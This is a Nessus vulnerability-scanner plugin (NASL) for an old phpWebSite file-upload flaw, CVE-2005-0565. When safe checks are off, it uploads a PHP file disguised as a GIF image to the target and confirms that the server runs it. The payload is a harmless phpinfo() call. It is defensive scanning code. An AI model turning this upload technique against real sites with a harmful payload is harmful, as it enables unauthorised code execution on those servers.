
phpWebSite Image Announcement Upload Arbitrary Command Execution

2005-02-25 00:00:00
This script is Copyright (C) 2005-2022 Tenable Network Security, Inc.
www.tenable.com

The remote host is running a version of phpWebSite in which the Announcements module allows a remote attacker to both upload PHP scripts disguised as image files and later run them using the permissions of the web server user.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

# Registration pass.  Nessus loads the script with `description` set to
# record the metadata below; the block exits before any network code runs.
if (description)
{
  script_id(17223);
  script_version("1.23");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2005-0565");
  script_bugtraq_id(12653);

  script_name(english:"phpWebSite Image Announcement Upload Arbitrary Command Execution");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that allows for arbitrary
code execution.");
  script_set_attribute(attribute:"description", value:
"The remote host is running a version of phpWebSite in which the
Announcements module allows a remote attacker to both upload PHP
scripts disguised as image files and later run them using the
permissions of the web server user.");
  script_set_attribute(attribute:"see_also", value:"https://marc.info/?l=bugtraq&m=110928565530828&w=2");
  # http://phpwebsite.appstate.edu/index.php?module=announce&ANN_id=922&ANN_user_op=view
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?13948819");
  # 0.10.1 is the fix boundary.  The safe-check regex in the scan body
  # flags 0.0.x-0.9.x and exactly 0.10.0; keep the two in step if either
  # is ever changed.
  script_set_attribute(attribute:"solution", value:
"Apply the security patch referenced in the vendor advisory above or
upgrade to version 0.10.1 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");

  # "No exploit is required": the scan body carries its own proof of
  # concept (an uploaded phpinfo() script), so no external exploit is
  # needed to confirm the issue.
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"vuln_publication_date", value:"2005/02/25");
  script_set_attribute(attribute:"plugin_publication_date", value:"2005/02/25");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:phpwebsite:phpwebsite");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  # ACT_MIXED_ATTACK: the scan body is passive when safe_checks() is on
  # (version match only) and intrusive otherwise (it uploads and executes
  # a PHP file on the target).
  script_category(ACT_MIXED_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2005-2022 Tenable Network Security, Inc.");

  # Needs the install/version KB entry written by phpwebsite_detect.nasl;
  # not run when CGI scanning is disabled for the scan.
  script_dependencies("phpwebsite_detect.nasl");
  script_require_keys("www/phpwebsite");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


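port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);


# Examine the phpWebSite install recorded for this port.  The KB value has
# the form "<version> under <dir>".  A single KB entry is read, so one
# install per port is checked, and the script ends on its first finding.
install = get_kb_item(string("www/", port, "/phpwebsite"));
if (isnull(install)) exit(0);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches)) {
  init_cookiejar();
  ver = matches[1];
  dir = matches[2];

  # Fetch the announcement submission form.  The vulnerable code path only
  # exists when the form offers the ANN_image upload field, so nothing is
  # reported without it, whatever the version string says.
  url = "/index.php";
  url_args = "module=announce&ANN_user_op=submit_announcement";
  r = http_send_recv3(method: "GET", item:dir + url + "?" + url_args, port:port);
  if (isnull(r)) exit(0);

  # If file uploads are supported....
  if ('<input type="file" name="ANN_image"' >< r[2]) {

    # Safe checks: decide on the version string alone.  The pattern covers
    # 0.0.x-0.9.x and exactly 0.10.0; 0.10.1 and later (the fixed releases
    # named in the solution) do not match and are not reported.
    if (safe_checks()) {
      if (ver =~ "^0\.([0-9]\.|10\.0$)") {
        security_hole(port:port);
        exit(0);
      }
    }
    # Otherwise, try to exploit it: submit an announcement whose "image"
    # attachment is a PHP script with a .gif.php name, then request the
    # uploaded file and see whether the server executed it.
    else {
      # NOTE(review): init_cookiejar() was called above, presumably so that
      # any session cookie set by the GET is replayed on this POST -- confirm.
      bound = "bound";
      boundary = string("--", bound);
      postdata = string(
        boundary, "\r\n",
        'Content-Disposition: form-data; name="module"', "\r\n",
        "\r\n",
        "announce\r\n",

        boundary, "\r\n",
        'Content-Disposition: form-data; name="ANN_user_op"', "\r\n",
        "\r\n",
        "save\r\n",

        boundary, "\r\n",
        'Content-Disposition: form-data; name="ANN_subject"', "\r\n",
        "\r\n",
        "Image Upload Test\r\n",

        boundary, "\r\n",
        'Content-Disposition: form-data; name="ANN_summary"', "\r\n",
        "\r\n",
        "Image uploads are possible!\r\n",

        boundary, "\r\n",
        'Content-Disposition: form-data; name="ANN_body"', "\r\n",
        "\r\n",
        "See attached image.\r\n",

        boundary, "\r\n",
        'Content-Disposition: form-data; name="ANN_image"; filename="exploit.gif.php"', "\r\n",
        "Content-Type: image/gif\r\n",
        "\r\n",
        # NB: This is the payload the target will execute.  It is
        #     deliberately benign (phpinfo() only): its output is both the
        #     proof of execution tested for below and the only effect the
        #     upload has on the host.  Keep it that way.
        "<?php phpinfo() ?>\r\n",

        boundary, "\r\n",
        'Content-Disposition: form-data; name="ANN_alt"', "\r\n",
        "\r\n",
        "empty\r\n",

        boundary, "--", "\r\n"
      );
      r = http_send_recv3(port:port, method: "POST", item: dir+url, data: postdata,
        add_headers: make_array("Content-Type", "multipart/form-data; boundary="+bound));
      if (isnull(r)) exit(0);

      # Request the attachment we just uploaded.  The POST response itself
      # is not inspected: a rejected upload simply produces a miss below.
      # The path assumes the module stores uploads under images/announce/
      # with the submitted filename.
      url = string(dir, "/images/announce/exploit.gif.php");
      r = http_send_recv3(method: "GET", item:url, port:port);
      if (isnull(r)) exit(0);

      # Only phpinfo() output proves execution.  A server that returns the
      # file's raw source ("<?php phpinfo() ?>") does not contain this
      # string and is not flagged.
      if ("PHP Version" >< r[2]) {
        # The uploaded file is not removed by the plugin; the report tells
        # the user where it is and that it must be deleted by hand.
        w = string(
            "**** Nessus has successfully exploited this vulnerability by uploading\n",
            "**** an image file with PHP code that reveals information about the\n",
            "**** PHP configuration on the remote host. The file is located under\n",
            "**** the web server's document directory as:\n",
            "****          ", url, "\n",
            "**** You are strongly encouraged to delete this attachment as soon as\n",
            "**** possible as it can be run by anyone who accesses it remotely.\n" );
        security_hole(port:port, extra: w);
        exit(0);
      }
    }
  }
}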